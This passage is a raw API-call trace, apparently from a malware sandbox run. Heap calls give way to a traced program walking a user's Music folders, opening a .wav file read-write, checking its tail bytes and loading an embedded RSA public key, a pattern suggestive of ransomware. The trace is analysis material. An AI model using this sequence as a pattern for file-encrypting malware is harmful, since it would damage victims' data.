lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.998] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\") returned="61X TO95hR3JMn6Z\\" [0196.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47a88 [0196.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.998] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\") returned="PsRcKmPEdiF_ OxVk\\" [0196.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0196.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a88 | out: hHeap=0x6a0000) returned 1 [0196.999] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\") returned="iPggquG4\\" [0196.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0196.999] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0196.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d040 [0196.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.999] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0196.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d040 | out: hHeap=0x6a0000) returned 1 [0197.000] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.000] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.000] PathFindFileNameW (pszPath="") returned="" [0197.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.001] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb73d070, ftCreationTime.dwHighDateTime=0x1d8a6a3, ftLastAccessTime.dwLowDateTime=0xf0c05110, ftLastAccessTime.dwHighDateTime=0x1d8a6d5, ftLastWriteTime.dwLowDateTime=0xf0c05110, ftLastWriteTime.dwHighDateTime=0x1d8a6d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0197.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.004] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb73d070, ftCreationTime.dwHighDateTime=0x1d8a6a3, ftLastAccessTime.dwLowDateTime=0xf0c05110, ftLastAccessTime.dwHighDateTime=0x1d8a6d5, ftLastWriteTime.dwLowDateTime=0xf0c05110, ftLastWriteTime.dwHighDateTime=0x1d8a6d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.004] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x346dfd40, ftCreationTime.dwHighDateTime=0x1d89e52, ftLastAccessTime.dwLowDateTime=0xbac6ce30, ftLastAccessTime.dwHighDateTime=0x1d89e6b, ftLastWriteTime.dwLowDateTime=0xbac6ce30, ftLastWriteTime.dwHighDateTime=0x1d89e6b, nFileSizeHigh=0x0, nFileSizeLow=0xa39f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brlU 5vGds.wav", cAlternateFileName="BRLU5V~1.WAV")) returned 1 [0197.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.005] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\brlU 5vGds.wav") returned=".wav" [0197.005] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\brlU 5vGds.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\brlu 5vgds.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.007] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=41887) returned 1 [0197.008] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.011] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xa379, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.011] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.013] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.013] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa39f, lpOverlapped=0x0) returned 1 [0197.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.014] lstrlenA (lpString="-----BEGIN PUBLIC 